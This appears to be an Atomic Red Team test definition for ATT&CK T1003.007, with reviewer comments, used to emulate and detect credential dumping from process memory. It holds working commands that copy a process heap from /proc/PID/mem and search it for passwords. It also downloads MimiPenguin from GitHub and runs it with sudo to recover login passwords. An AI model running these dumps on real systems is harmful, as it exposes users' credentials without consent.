62a85c12b5
* freebsd changes * renaming freebsd to linux
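# Atomic test definitions (atomic_tests schema) for ATT&CK technique T1003.007,
# OS Credential Dumping via the proc filesystem. Every test declares the
# platform it targets, its input arguments, dependency checks with a
# get_prereq_command fallback, and an executor block with command + cleanup.
# Each executor runs with elevation_required: true (reading another process's
# memory via /proc needs it).
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
  - name: Dump individual process memory with sh (Local)
    auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
    description: |
      Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
      copy process memory to an external file so it can be searched or exfiltrated later.
    supported_platforms:
      - linux

    input_arguments:
      output_file:
        description: Path where captured results will be placed
        type: path
        default: /tmp/T1003.007.bin
      script_path:
        description: Path to script generating the target process
        type: path
        default: /tmp/T1003.007.sh
      pid_term:
        description: Unique string to use to identify target process
        type: string
        default: T1003.007

    dependencies:
      - description: |
          Script to launch target process must exist
        prereq_command: |
          test -f #{script_path}
          grep "#{pid_term}" #{script_path}
        get_prereq_command: |
          echo '#!/bin/sh' > #{script_path}
          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}

    executor:
      name: sh
      elevation_required: true
      # MEM_START and MEM_STOP are already converted from the hex address
      # columns of /proc/<pid>/maps to decimal, so MEM_SIZE subtracts them
      # as-is. The previous form re-prefixed the decimal values with 0x,
      # which reinterpreted them as hex and produced a wrong byte count for dd.
      command: |
        sh #{script_path}
        PID=$(pgrep -n -f "#{pid_term}")
        HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
        MEM_START=$((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))
        MEM_STOP=$((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))
        MEM_SIZE=$((MEM_STOP - MEM_START))
        dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
        grep -i "PASS" "#{output_file}"
      cleanup_command: |
        rm -f "#{output_file}"

  - name: Dump individual process memory with sh on FreeBSD (Local)
    auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
    description: |
      Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
      copy process memory to an external file so it can be searched or exfiltrated later.
      On FreeBSD procfs must be mounted.
    # NOTE(review): the name, the description and the command (which reads
    # /proc/<pid>/map rather than Linux's /proc/<pid>/maps) all describe a
    # FreeBSD test, but the platform is declared as linux. The commit message
    # ("renaming freebsd to linux") suggests this was done deliberately,
    # presumably for schema validation; confirm how the runner is expected to
    # select this test, since on a Linux host /proc/<pid>/map does not exist.
    supported_platforms:
      - linux

    input_arguments:
      output_file:
        description: Path where captured results will be placed
        type: path
        default: /tmp/T1003.007.bin
      script_path:
        description: Path to script generating the target process
        type: path
        default: /tmp/T1003.007.sh
      pid_term:
        description: Unique string to use to identify target process
        type: string
        default: T1003.007

    dependencies:
      - description: |
          Script to launch target process must exist
        prereq_command: |
          test -f #{script_path}
          grep "#{pid_term}" #{script_path}
        get_prereq_command: |
          echo '#!/bin/sh' > #{script_path}
          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}

    executor:
      name: sh
      elevation_required: true
      # The start/end columns taken from /proc/<pid>/map are used verbatim
      # (they carry their own 0x prefix, unlike the Linux test above), so the
      # arithmetic here must not add a second prefix.
      command: |
        sh #{script_path}
        PID=$(pgrep -n -f "#{pid_term}")
        MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
        MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
        MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
        dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
        strings "#{output_file}" | grep -i PASS
      cleanup_command: |
        rm -f "#{output_file}"

  - name: Dump individual process memory with Python (Local)
    auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
    # NOTE(review): the last description line mentions FreeBSD, but the only
    # declared platform is linux — confirm whether dump_heap.py handles both
    # or whether the sentence was carried over from the FreeBSD test.
    description: |
      Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
      copy a process's heap memory to an external file so it can be searched or exfiltrated later.
      On FreeBSD procfs must be mounted.
    supported_platforms:
      - linux

    input_arguments:
      output_file:
        description: Path where captured results will be placed
        type: path
        default: /tmp/T1003.007.bin
      script_path:
        description: Path to script generating the target process
        type: path
        default: /tmp/T1003.007.sh
      python_script:
        # Was a copy-paste of script_path's description; this argument is the
        # dumper itself, invoked below as "<python> <script> <pid> <output_file>".
        description: Path to Python script that dumps the target process heap (run with the PID and output file as arguments)
        type: path
        default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
      pid_term:
        description: Unique string to use to identify target process
        type: string
        default: T1003.007

    dependencies:
      - description: |
          Script to launch target process must exist
        prereq_command: |
          test -f #{script_path}
          grep "#{pid_term}" #{script_path}
        get_prereq_command: |
          echo '#!/bin/sh' > #{script_path}
          echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
      - description: |
          Requires Python
        prereq_command: |
          (which python || which python3 || which python2)
        # There is no automatic installer here; the fallback only tells the
        # operator what is missing, so the test will not auto-satisfy this.
        get_prereq_command: |
          echo "Python 2.7+ or 3.4+ must be installed"

    executor:
      name: sh
      elevation_required: true
      # Script and output paths are quoted so a PathToAtomicsFolder containing
      # spaces does not split the arguments.
      command: |
        sh #{script_path}
        PID=$(pgrep -n -f "#{pid_term}")
        PYTHON=$(which python || which python3 || which python2)
        $PYTHON "#{python_script}" "$PID" "#{output_file}"
        grep -i "PASS" "#{output_file}"
      cleanup_command: |
        rm -f "#{output_file}"

  - name: Capture Passwords with MimiPenguin
    auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
    description: |
      MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
      Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
      See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
      See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
    supported_platforms:
      - linux

    input_arguments:
      output_file:
        description: Path where captured results will be placed
        type: path
        default: /tmp/T1003.007Test3.txt
      MimiPenguin_Location:
        description: Path of MimiPenguin script
        type: path
        default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh

    dependency_executor_name: sh
    dependencies:
      - description: |
          MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
        prereq_command: |
          if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
        # Supply-chain note: the release tarball is downloaded and extracted
        # without any checksum or signature verification, into fixed,
        # predictable /tmp paths. Pin the expected digest and verify it before
        # tar runs, e.g. `echo "<SHA256_PLACEHOLDER>  /tmp/mimipenguin.tar.gz" | sha256sum -c -`.
        # mkdir -p keeps a re-run from failing when the directory already
        # exists (the cleanup below only removes the output file, not
        # /tmp/mimipenguin or the tarball).
        get_prereq_command: |
          wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
          mkdir -p /tmp/mimipenguin
          tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
      # The three tool checks below use plain `command -v NAME`; the old
      # `command -v NAME --version` form passed a stray second name that
      # contributed nothing to the result.
      - description: |
          Strings must be installed
        prereq_command: |
          if [ -x "$(command -v strings)" ]; then exit 0; else exit 1; fi;
        get_prereq_command: |
          sudo apt-get -y install binutils
      - description: |
          Python2 must be installed
        prereq_command: |
          if [ -x "$(command -v python2)" ]; then exit 0; else exit 1; fi;
        get_prereq_command: |
          sudo apt-get -y install python2
      - description: |
          Libc-bin must be installed
        prereq_command: |
          if [ -x "$(command -v ldd)" ]; then exit 0; else exit 1; fi;
        get_prereq_command: |
          sudo apt-get -y install libc-bin

    executor:
      name: bash
      elevation_required: true
      command: |
        sudo "#{MimiPenguin_Location}" > "#{output_file}"
        cat "#{output_file}"
      cleanup_command: |
        rm -f "#{output_file}" > /dev/null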